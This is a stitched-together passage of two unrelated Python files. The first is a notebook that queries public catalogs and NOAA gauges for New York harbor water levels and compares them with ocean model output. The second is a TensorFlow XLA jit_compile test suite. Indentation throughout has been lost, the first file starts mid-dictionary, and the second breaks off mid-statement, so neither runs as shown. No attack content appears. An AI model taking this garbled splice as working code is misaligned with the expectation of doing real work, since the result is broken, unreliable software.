[datetime(2012, 10, 26), datetime(2012, 11, 2)],
'2014 Feb 10-15 Storm':
[datetime(2014, 2, 10), datetime(2014, 2, 15)],
'2014 Recent': [datetime(2014, 3, 8), datetime(2014, 3, 11)],
'2011': [datetime(2013, 4, 20), datetime(2013, 4, 24)]}
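# The named events above are listed for convenience; the cells below default
# to a window of +/- 3 days around the current time.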
jd_now = datetime.utcnow()
jd_start, jd_stop = jd_now - timedelta(days=3), jd_now + timedelta(days=3)
start_date = jd_start.strftime('%Y-%m-%d %H:00')
stop_date = jd_stop.strftime('%Y-%m-%d %H:00')
jd_start = datetime.strptime(start_date, '%Y-%m-%d %H:%M')
jd_stop = datetime.strptime(stop_date, '%Y-%m-%d %H:%M')
print('%s to %s' % (start_date, stop_date))
# <codecell>
# Bounding Box [lon_min, lat_min, lon_max, lat_max]
area = {'Hawaii': [-160.0, 18.0, -154., 23.0],
'Gulf of Maine': [-72.0, 41.0, -69.0, 43.0],
'New York harbor region': [-75., 39., -71., 41.5]}
box = area['New York harbor region']
# <markdowncell>
# ### Search CSW for datasets of interest
# <codecell>
if False:
from IPython.core.display import HTML
url = 'http://www.ngdc.noaa.gov/geoportal/'
HTML('<iframe src=%s width=950 height=400></iframe>' % url)
# <codecell>
# Connect to the CSW endpoint and explore its properties.
CSW = {'NGDC Geoportal':
'http://www.ngdc.noaa.gov/geoportal/csw',
'USGS WHSC Geoportal':
'http://geoport.whoi.edu/geoportal/csw',
'NODC Geoportal: granule level':
'http://www.nodc.noaa.gov/geoportal/csw',
'NODC Geoportal: collection level':
'http://data.nodc.noaa.gov/geoportal/csw',
'NRCAN CUSTOM':
'http://geodiscover.cgdi.ca/wes/serviceManagerCSW/csw',
'USGS Woods Hole GI_CAT':
'http://geoport.whoi.edu/gi-cat/services/cswiso',
'USGS CIDA Geonetwork':
'http://cida.usgs.gov/gdp/geonetwork/srv/en/csw',
'USGS Coastal and Marine Program':
'http://cmgds.marine.usgs.gov/geonetwork/srv/en/csw',
'USGS Woods Hole Geoportal':
'http://geoport.whoi.edu/geoportal/csw',
'CKAN testing site for new Data.gov':
'http://geo.gov.ckan.org/csw',
'EPA':
'https://edg.epa.gov/metadata/csw',
'CWIC':
'http://cwic.csiss.gmu.edu/cwicv1/discovery'}
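# Pick one CSW endpoint for this run; swap the key below to try another catalog.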
endpoint = CSW['NGDC Geoportal']
csw = CatalogueServiceWeb(endpoint, timeout=60)
csw.version
# <codecell>
csw.get_operation_by_name('GetRecords').constraints
# <markdowncell>
# ### Convert User Input into FES filters.
# <codecell>
start, stop = fes_date_filter(start_date, stop_date)
bbox = fes.BBox(box)
# <codecell>
or_filt = fes.Or([fes.PropertyIsLike(propertyname='apiso:AnyText',
literal=('*%s*' % val),
escapeChar='\\',
wildCard='*',
singleChar='?') for val in name_list])
# <markdowncell>
# ROMS model output often comes as Averages and History files. The Averages
# files are usually averaged over a tidal cycle or more, while the History
# files are snapshots at that instant. We are not interested in averaged data
# for this test, so the cell below drops any dataset whose metadata text
# contains the term "Averages". A better approach would be to look at the
# `cell_methods` attributes propagated through to some term in the ISO
# metadata, but as far as I know that is not implemented yet.
# <codecell>
val = 'Averages'
not_filt = fes.Not([fes.PropertyIsLike(propertyname='apiso:AnyText',
literal=('*%s*' % val),
escapeChar='\\',
wildCard='*',
singleChar='?')])
filter_list = [fes.And([bbox, start, stop, or_filt, not_filt])]
# <markdowncell>
# Try the request using the multiple-filter "and" syntax: [[filter1, filter2]].
# <codecell>
csw.getrecords2(constraints=filter_list, maxrecords=1000, esn='full')
print(len(csw.records.keys()))
# <markdowncell>
# Now print out some titles
# <codecell>
for rec, item in csw.records.items():
print(item.title)
# <markdowncell>
# Print out all the OPeNDAP Data URL endpoints
# <codecell>
dap_urls = service_urls(csw.records,
service='odp:url')
print("\n".join(dap_urls))
# <markdowncell>
# Print out all the SOS Data URL endpoints
# <codecell>
sos_urls = service_urls(csw.records,
service='sos:url')
print("\n".join(sos_urls))
# <markdowncell>
# ## 1. Get observations from SOS
# Here we are using a custom class from pyoos to read the CO-OPS SOS. This is
# definitely unsavory, as the whole point of using a standard is to avoid the
# need for custom classes for each service. We need to examine the
# consequences of removing this and just going with a straight SOS service
# using OWSLib.
# <codecell>
collector = CoopsSos()
collector.set_datum('NAVD')  # North American Vertical Datum (not MSL)
collector.server.identification.title
collector.start_time = jd_start
collector.end_time = jd_stop
collector.variables = [sos_name]
# <codecell>
ofrs = collector.server.offerings
print(len(ofrs))
for p in ofrs[700:710]:
print(p)
# <markdowncell>
# ### Find the SOS stations within our bounding box and time extent
# We would like to just apply a filter to a collection to get a new
# collection, but pyoos doesn't do that yet. So we make a GetObservation
# request for a collection, including a bounding box and asking for a single
# value at the start of the time period of interest. That acts as a bounding
# box filter on the SOS server, which returns one point per station found: for
# 3 stations we get back 3 records, in CSV format. We strip the station ids
# from the CSV and then have a list of stations we can use with pyoos. The
# template for the bounding-box-filtered GetObservation query was generated
# with the GUI at http://opendap.co-ops.nos.noaa.gov/ioos-dif-sos/
# <codecell>
iso_start = jd_start.strftime('%Y-%m-%dT%H:%M:%SZ')
print(iso_start)
box_str = ','.join(str(e) for e in box)
print(box_str)
# <codecell>
url = ('http://opendap.co-ops.nos.noaa.gov/ioos-dif-sos/SOS?'
'service=SOS&request=GetObservation&version=1.0.0&'
'observedProperty=%s&offering=urn:ioos:network:NOAA.NOS.CO-OPS:'
'WaterLevelActive&featureOfInterest=BBOX:%s&responseFormat='
'text/csv&eventTime=%s' % (sos_name, box_str, iso_start))
print(url)
obs_loc_df = read_csv(url)
# <codecell>
obs_loc_df.head()
# <codecell>
stations = [sta.split(':')[-1] for sta in obs_loc_df['station_id']]
obs_lon = [sta for sta in obs_loc_df['longitude (degree)']]
obs_lat = [sta for sta in obs_loc_df['latitude (degree)']]
print(stations)
# <markdowncell>
# Generate a uniform 6-min time base for model/data comparison:
# <codecell>
ts_rng = date_range(start=jd_start, end=jd_stop, freq='6Min')
ts = DataFrame(index=ts_rng)
print(jd_start, jd_stop)
print(len(ts))
# <markdowncell>
# Create a list of obs dataframes, one for each station:
# <codecell>
obs_df = []
sta_names = []
sta_failed = []
for sta in stations:
b = coops2df(collector, sta, sos_name)
name = b.name
sta_names.append(name)
print(name)
if b.empty:
sta_failed.append(name)
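        # Station returned no data: keep an all-NaN series so it still appears
        # in the comparison plots.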
b = DataFrame(np.arange(len(ts)) * np.NaN, index=ts.index, columns=['Observed Data'])
b.name = name
# Limit interpolation to 10 points (10 @ 6min = 1 hour).
col = 'Observed Data'
concatenated = concat([b, ts], axis=1).interpolate(limit=10)[col]
obs_df.append(DataFrame(concatenated))
obs_df[-1].name = b.name
# <codecell>
geodetic = ccrs.Geodetic(globe=ccrs.Globe(datum='WGS84'))
tiler = MapQuestOpenAerial()
fig, ax = plt.subplots(figsize=(8, 8), subplot_kw=dict(projection=tiler.crs))
# Open Source Imagery from MapQuest (max zoom = 16?)
zoom = 8
extent = [box[0], box[2], box[1], box[3]]
ax.set_extent(extent, geodetic)
ax.add_image(tiler, zoom)
ax.scatter(obs_lon, obs_lat, marker='o', s=30,
color='cyan', transform=ccrs.PlateCarree())
geodetic_transform = ccrs.Geodetic()._as_mpl_transform(ax)
text_transform = offset_copy(geodetic_transform, units='dots', x=-7, y=+7)
for x, y, label in zip(obs_lon, obs_lat, sta_names):
ax.text(x, y, label, horizontalalignment='left',
transform=text_transform, color='white')
gl = ax.gridlines(draw_labels=True)
gl.xlabels_top = gl.ylabels_right = False
ax.set_title('Water Level Gauge Locations')
# <markdowncell>
# ### Get model output from OPeNDAP URLs
# Try to open all the OPeNDAP URLs using Iris from the UK Met Office. If a
# cube is 1D, assume the dataset is observed data; if 2D, assume it is an
# unstructured grid model; and if 3D, assume it is a structured grid model.
# <markdowncell>
# Construct an Iris constraint to load only cubes whose standard_name is in name_list:
# <codecell>
print('\n'.join(name_list))
name_in_list = lambda cube: cube.standard_name in name_list
constraint = iris.Constraint(cube_func=name_in_list)
# <markdowncell>
# Use only data within 0.04 degrees (about 4 km).
# <codecell>
max_dist = 0.04
# <markdowncell>
# Use only data where the standard deviation of the time series exceeds 0.01 m
# (1 cm); this eliminates flat-line model time series that come from land
# points that should have had missing values.
# <codecell>
min_var = 0.01
# <codecell>
for url in dap_urls:
try:
a = iris.load_cube(url, constraint)
# convert to units of meters
# a.convert_units('m') # this isn't working for unstructured data
# take first 20 chars for model name
mod_name = a.attributes['title'][0:20]
r = a.shape
timevar = find_timevar(a)
lat = a.coord(axis='Y').points
lon = a.coord(axis='X').points
jd = timevar.units.num2date(timevar.points)
start = timevar.units.date2num(jd_start)
istart = timevar.nearest_neighbour_index(start)
stop = timevar.units.date2num(jd_stop)
istop = timevar.nearest_neighbour_index(stop)
# Only proceed if we have data in the range requested.
if istart != istop:
nsta = len(obs_lon)
if len(r) == 3:
print('[Structured grid model]:', url)
d = a[0, :, :].data
# Find the closest non-land point from a structured grid model.
if len(lon.shape) == 1:
lon, lat = np.meshgrid(lon, lat)
j, i, dd = find_ij(lon, lat, d, obs_lon, obs_lat)
for n in range(nsta):
                # Only use if the model cell is within max_dist degrees of the
                # requested location.
if dd[n] <= max_dist:
arr = a[istart:istop, j[n], i[n]].data
if arr.std() >= min_var:
c = mod_df(arr, timevar, istart, istop,
mod_name, ts)
name = obs_df[n].name
obs_df[n] = concat([obs_df[n], c], axis=1)
obs_df[n].name = name
elif len(r) == 2:
print('[Unstructured grid model]:', url)
# Find the closest point from an unstructured grid model.
index, dd = nearxy(lon.flatten(), lat.flatten(),
obs_lon, obs_lat)
for n in range(nsta):
                # Only use if the model cell is within max_dist degrees of the
                # requested location.
if dd[n] <= max_dist:
arr = a[istart:istop, index[n]].data
if arr.std() >= min_var:
c = mod_df(arr, timevar, istart, istop,
mod_name, ts)
name = obs_df[n].name
obs_df[n] = concat([obs_df[n], c], axis=1)
obs_df[n].name = name
elif len(r) == 1:
print('[Data]:', url)
except (ValueError, RuntimeError, CoordinateNotFoundError,
ConstraintMismatchError) as e:
warn("\n%s\n" % e)
pass
# <codecell>
for df in obs_df:
ax = df.plot(figsize=(14, 6), title=df.name, legend=False)
plt.setp(ax.lines[0], linewidth=4.0, color='0.7', zorder=1)
ax.legend()
ax.set_ylabel('m')
# <markdowncell>
# Plot again, but now remove the mean offset (relative to data) from all plots.
# <codecell>
for df in obs_df:
amean = df[jd_start:jd_now].mean()
name = df.name
    df = df - amean + amean.iloc[0]
df.name = name
ax = df.plot(figsize=(14, 6), title=df.name, legend=False)
plt.setp(ax.lines[0], linewidth=4.0, color='0.7', zorder=1)
ax.legend()
ax.set_ylabel('m')
    print(amean.iloc[0] - amean)
|
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import gc
import re
from tensorflow.compiler.tests import xla_test
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
@test_util.with_eager_op_as_function
class DefFunctionTest(xla_test.XLATestCase):
def testAutoclusteringWithTfFunction(self):
if 'tpu' in self.device.lower():
self.skipTest('Autoclustering does not run on TPU')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=False)
def outer(a, b, c):
return a * inner(b, c) + c
@def_function.function(jit_compile=True)
def inner(b, c):
return b + c * b
i1 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0])
i2 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0])
i3 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0])
with context.collect_graphs(optimized=True) as graphs:
outer(i1, i2, i3)
if test_util.is_xla_enabled():
self.assertIn('_XlaRun', [n.op for n in graphs[0].node])
else:
self.assertNotIn('_XlaRun', [n.op for n in graphs[0].node])
def testBasic(self):
with ops.device('device:{}:0'.format(self.device)):
def fn(x, a):
return x + a
func = def_function.function(fn, jit_compile=False)
xla_func = def_function.function(fn, jit_compile=True)
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertAllClose([2, 3, 3, 4, 4], func(inputs, 1))
self.assertAllClose([2, 3, 3, 4, 4], xla_func(inputs, 1))
def testBasicInt32(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, a):
return x + a
inputs = constant_op.constant([1, 2, 2, 3, 3], dtype=dtypes.int32)
self.assertAllClose([2, 3, 3, 4, 4], fn(inputs, 1))
def testDerivative(self):
with ops.device('device:{}:0'.format(self.device)):
def fn(x, a):
return 2 * x + a
xla_func = def_function.function(fn, jit_compile=True)
with backprop.GradientTape() as tape:
inputs = constant_op.constant([1., 2., 2., 3., 3.])
tape.watch(inputs)
outputs = xla_func(inputs, 1)
self.assertAllClose([2, 2, 2, 2, 2], tape.gradient(outputs, inputs))
# pylint: disable=protected-access
(forward, backward) = xla_func.get_concrete_function(
inputs, 1)._delayed_rewrite_functions.forward_backward()
# Check that the must-compile attribute gets correctly propagated to the
# created derivatives.
self.assertTrue(backward.function_def.attr['_XlaMustCompile'])
self.assertTrue(forward.definition.attr['_XlaMustCompile'])
  # Calling a function with jit_compile=True from a function with
  # jit_compile=False should compile the inner function.
def testNestedCall(self):
if 'tpu' in self.device.lower():
self.skipTest('b/162800687: Inner function runs on host')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, a):
return x + a
@def_function.function(jit_compile=False)
def fn2(x, a):
return fn(x, a)
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertAllClose([2, 3, 3, 4, 4], fn2(inputs, 1))
def testNestedCallUnsupportedOps(self):
if 'tpu' in self.device.lower():
self.skipTest('Outside compilation will extract string_length to CPU')
with ops.device('device:{}:0'.format(self.device)):
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x))
xla_func = def_function.function(fn, jit_compile=True)
def fn2(x):
return xla_func(x)
func = def_function.function(fn2, jit_compile=False)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(
errors.InvalidArgumentError, 'legalization failed'
if test_util.is_mlir_bridge_enabled() else 'unsupported operations'):
func(inputs)
def testUnsupportedOps(self):
with ops.device('device:{}:0'.format(self.device)):
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x))
xla_func = def_function.function(fn, jit_compile=True)
with self.assertRaisesRegex(
errors.InvalidArgumentError, 'legalization failed'
if test_util.is_mlir_bridge_enabled() else 'unsupported operations'):
xla_func(constant_op.constant([3.1, 3.2]))
def testCollectiveReduceChannelId(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, y):
t0 = collective_ops.all_reduce_v2(
t=x, group_size=2, group_key=1, instance_key=1)
t1 = collective_ops.all_reduce_v2(
t=y, group_size=2, group_key=1, instance_key=1)
return t0 + t1
inputs = constant_op.constant([1.0, 2.0, 3.0])
# Make sure 2 different channel ids are assigned to the 2 all-reduce
# instructions generated by XLA.
hlo_str = fn.experimental_get_compiler_ir(inputs, inputs)()
matches = re.findall('channel_id=([0-9]*),', hlo_str)
self.assertLen(matches, 2)
self.assertNotEqual(matches[0], matches[1])
  @test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not '
                                 'support stack traces')
def testPythonLocationInMetadata(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, y):
return x + y
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertIn('def_function_xla_jit_test',
fn.experimental_get_compiler_ir(inputs, inputs)())
  @test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not '
                                 'support stack traces')
def testPythonLocationNestedInMetadata(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x, y):
return x + y
@def_function.function(jit_compile=True)
def g(x, y):
return f(x, y)
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertIn('def_function_xla_jit_test',
g.experimental_get_compiler_ir(inputs, inputs)())
def testPythonStackTrace(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT2
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT2'):
fn(inputs)
def testPythonStackTraceUncompiledWithinCompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT3
@def_function.function(jit_compile=True)
def outer(x):
return fn(x)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT3'):
outer(inputs)
  @test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not '
                                 'support stack traces')
def testPythonStackTraceCompiledWithinUncompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT1
@def_function.function
def outer(x):
return fn(x)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT1'):
outer(inputs)
  @test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not '
                                 'support stack traces')
def testPythonStackTraceCompiledWithinCompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT4
@def_function.function
def outer(x):
return fn(x)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT4'):
outer(inputs)
def testFunctionGradient(self):
with ops.device('device:{}:0'.format(self.device)):
v = resource_variable_ops.ResourceVariable(2.0)
def fn(x):
return v * x
func = def_function.function(fn, jit_compile=False)
xla_func = def_function.function(fn, jit_compile=True)
def run_and_check(test_func):
x = constant_op.constant(3.0)
with backprop.GradientTape() as tape:
y = test_func(x)
dy = tape.gradient(y, v)
self.assertAllClose(6.0, y)
self.assertAllClose(3.0, dy)
run_and_check(func)
run_and_check(xla_func)
@test_util.disable_mlir_bridge('TODO(b/162521846): MLIR bridge fails'
' msan, function library not found')
def testControlFlow(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
assert control_flow_util.GraphOrParentsInXlaContext(
ops.get_default_graph())
x = ops.convert_to_tensor(x)
def body(i, a):
return i + 1, control_flow_ops.cond(i > 2, lambda: a + (x**2),
lambda: a + 3)
return control_flow_ops.while_loop(
lambda i, *_: i < 10,
body, (constant_op.constant(0), constant_op.constant(3.)),
maximum_iterations=10)[1]
@def_function.function(jit_compile=True)
def g(x):
x = ops.convert_to_tensor(x)
with backprop.GradientTape() as tape:
tape.watch(x)
y = f(x)
return y, tape.gradient(y, x)
# Test that XLA context gets correctly propagated.
g._get_concrete_function_garbage_collected(2.0)(2.0)
self.assertAllClose(40.0, f(2.0))
self.assertAllClose([40.0, 28.0], g(2.0))
self.assertAllClose(40.0, f.get_concrete_function(2.0)(2.0))
self.assertAllClose([40.0, 28.0], g.get_concrete_function(2.0)(2.0))
def testWhileLoopWithUnmodifiedCarriedShape(self):
with ops.device('device:{}:0'.format(self.device)):
signature = [tensor_spec.TensorSpec(shape=[None], dtype=dtypes.float32)]
# We define a signature that specifies unknown vector shape, then test
# that tf.shape constness gets properly propagated into the while_loop
# even when carried as part of the loop state.
@def_function.function(input_signature=signature, jit_compile=True)
def g(x):
return control_flow_ops.while_loop_v2(
lambda *_: True,
lambda y, shp: (y + random_ops.random_normal(shp)**2, shp),
(x, array_ops.shape(x)),
maximum_iterations=3)[0]
self.assertAllGreater(g(array_ops.zeros([7])), 0.)
def testNestedWhileLoopWithUnmodifiedCarriedShape(self):
with ops.device('device:{}:0'.format(self.device)):
signature = [tensor_spec.TensorSpec(shape=[None], dtype=dtypes.float32)]
@def_function.function(input_signature=signature, jit_compile=True)
def g(x):
def inner(z, shp):
return z + random_ops.random_normal(shp)**2, shp
def outer(y, shp):
y, shp = control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=3)
y, shp = array_ops.identity_n([y, shp])
return control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=5)
shp = array_ops.shape(x, name='x_shp')
return control_flow_ops.while_loop_v2(
lambda *_: True, outer, (x, shp), maximum_iterations=4)[0]
self.assertAllGreater(g(array_ops.zeros([7])), 0.)
def testNestedWhileLoopWithUnmodifiedCarriedShapeSlice(self):
with ops.device('device:{}:0'.format(self.device)):
signature = [
tensor_spec.TensorSpec(shape=[None, None], dtype=dtypes.float32)
]
@def_function.function(input_signature=signature, jit_compile=True)
def g(x):
def inner(z, shp):
return z + random_ops.random_normal(shp)**2, shp
def outer(y, shp):
y, shp = control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=3)
return control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=4)
shp = array_ops.shape(x, name='x_shp')
x = control_flow_ops.while_loop_v2(
lambda *_: True, outer, (x, shp), maximum_iterations=5)[0]
shp2 = array_ops.shape(x, name='x_shp_after')[1:]
w = control_flow_ops.while_loop_v2(
lambda *_: True,
outer, (array_ops.zeros_like(x[0]), shp2),
maximum_iterations=6)[0]
return x + w
self.assertAllGreater(g(array_ops.zeros([7, 13])), 0.)
def testMethodCompilation(self):
with ops.device('device:{}:0'.format(self.device)):
class C(object):
@def_function.function(jit_compile=True)
def f1(self, x, a):
return x + a
inputs = constant_op.constant([1, 2, 2, 3, 3])
c = C()
self.assertAllClose([2, 3, 3, 4, 4], c.f1(inputs, 1))
def testMethodCompilationUnsupportedFunc(self):
with ops.device('device:{}:0'.format(self.device)):
class C(object):
@def_function.function(jit_compile=True)
def f1(self, x):
return string_ops.string_length(
string_ops.string_format('{}', x))
inputs = constant_op.constant([1, 2, 2, 3, 3])
c = C()
with self.assertRaisesRegex(
errors.InvalidArgumentError, 'legalization failed'
if test_util.is_mlir_bridge_enabled() else 'unsupported operations'):
c.f1(inputs)
def testMustBeConstantPropagation(self):
if 'tpu' in self.device.lower():
self.skipTest('b/162799319: Cannot resolve constant on TPU')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f():
return constant_op.constant([0, 2, 1], dtype=dtypes.int32)
@def_function.function(jit_compile=True)
def g(a, b):
return array_ops.transpose(a, b)
@def_function.function
def z():
return g(array_ops.ones([3, 4, 3], dtype=dtypes.float32), f())
z()
def testArgMinMax(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def argmax(x):
return math_ops.argmax(x)
@def_function.function(jit_compile=True)
def argmin(x):
return math_ops.argmin(x)
self.assertAllClose(0, argmax(array_ops.ones([10], dtype=dtypes.float32)))
self.assertAllClose(0, argmax(array_ops.ones([10])))
self.assertAllClose(0, argmin(array_ops.ones([10], dtype=dtypes.float32)))
self.assertAllClose(0, argmin(array_ops.ones([10])))
@test_util.disable_mlir_bridge('TensorArray support not implemented')
def testErrorMessagePassingTensorArray(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=1, element_shape=[])
ta = ta.write(0, 2 * x)
y = ta.read(0)
return y
x = constant_op.constant(3.14)
with backprop.GradientTape() as tape:
tape.watch(x)
with self.assertRaisesRegex(errors.UnimplementedError,
'TensorList crossing the XLA/TF boundary'):
y = f(x)
tape.gradient(y, x)
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatV2(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
compiled_f = def_function.function(jit_compile=True)(f)
inputs = constant_op.constant([3.14, 2.68, 7.69])
self.assertAllClose([6.28, 5.36, 15.38, 9.42, 8.04, 23.07], f(inputs))
self.assertAllClose(compiled_f(inputs), f(inputs))
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatV2Multidim(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3, 2])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
compiled_f = def_function.function(jit_compile=True)(f)
inputs = constant_op.constant([[3.14, 21.1], [2.68, 22.2], [7.69, 23.3]])
self.assertAllClose(f(inputs), compiled_f(inputs))
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatV2Scalars(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[1])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
compiled_f = def_function.function(jit_compile=True)(f)
inputs = constant_op.constant([3.14])
self.assertAllClose(f(inputs), compiled_f(inputs))
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatGrad(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
def g():
x = constant_op.constant([3.14, 2.68, 7.69])
with backprop.GradientTape() as tape:
tape.watch(x)
y = f(x)
return tape.gradient(y, x)
compiled_g = def_function.function(jit_compile=True)(g)
self.assertAllClose([5.0, 5.0, 5.0], g())
self.assertAllClose(compiled_g(), g())
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatGradNestedCompile(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
@def_function.function(jit_compile=True)
def g():
x = constant_op.constant([3.14, 2.68, 7.69])
with backprop.GradientTape() as tape:
tape.watch(x)
y = f(x)
out = tape.gradient(y, x)
return out
self.assertAllClose([5.0, 5.0, 5.0], g())
def testCumsum(self):
if 'tpu' in self.device.lower():
self.skipTest('b/162771302: 64bit rewrite of cumsum not supported')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
return math_ops.cumsum(x)
f64_input = constant_op.constant([1.1, 2.2, 3.3], dtype=dtypes.float64)
self.assertAllClose([1.1, 3.3, 6.6], f(f64_input))
def testNoExcessiveRetracing(self):
with ops.device('device:{}:0'.format(self.device)):
inner_retracings = 0
@def_function.function(jit_compile=True)
def inner(a, b):
nonlocal inner_retracings
inner_retracings += 1
return a * b + a
def outer(a, b):
return inner(a, b)
func_input = random_ops.random_normal([10, 10])
for _ in range(2):
def_function.function(outer)(func_input, func_input)
self.assertEqual(inner_retracings, 1)
def testUpdateVariable(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([0.0, 0.0])
@def_function.function(jit_compile=True)
def f():
v.assign([3.1, 2.3])
f()
self.assertAllClose(v, [3.1, 2.3])
  @test_util.disable_mlir_bridge('TODO(b/199737685): MLIR bridge does not '
                                 'support tf.unique via jit_compile')
def testUniqueErrMsg(self):
if 'tpu' in self.device.lower():
self.skipTest('We do not check shapes on TPU')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x, y):
return array_ops.unique(x).y + array_ops.unique(y).y
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Fail to proof the equality'):
f(constant_op.constant([3.1, 3.2]),
constant_op.constant([3.3, 3.2]))
  @test_util.disable_mlir_bridge('TODO(b/199737685): MLIR bridge does not '
                                 'support tf.unique via jit_compile')
def testUniqueCompilability(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
return array_ops.unique(x).y
self.assertAllClose(f(constant_op.constant([3.1, 3.2, 3.2])), [3.1, 3.2])
def testUpdateVariableMemoryUsage(self):
with ops.device('device:{}:0'.format(self.device)):
on_gpu = 'gpu' in self.device.lower()
v = variables.Variable([3.1, 3.2])
@def_function.function(jit_compile=True)
def update_var(a, b):
v.assign_add(a * b)
arg1 = random_ops.random_normal([2])
arg2 = random_ops.random_normal([2])
gc.collect()
initial_usage = context.context().get_memory_info(
v.device)['current'] if on_gpu else 0
update_var(arg1, arg2)
gc.collect()
final_usage = context.context().get_memory_info(
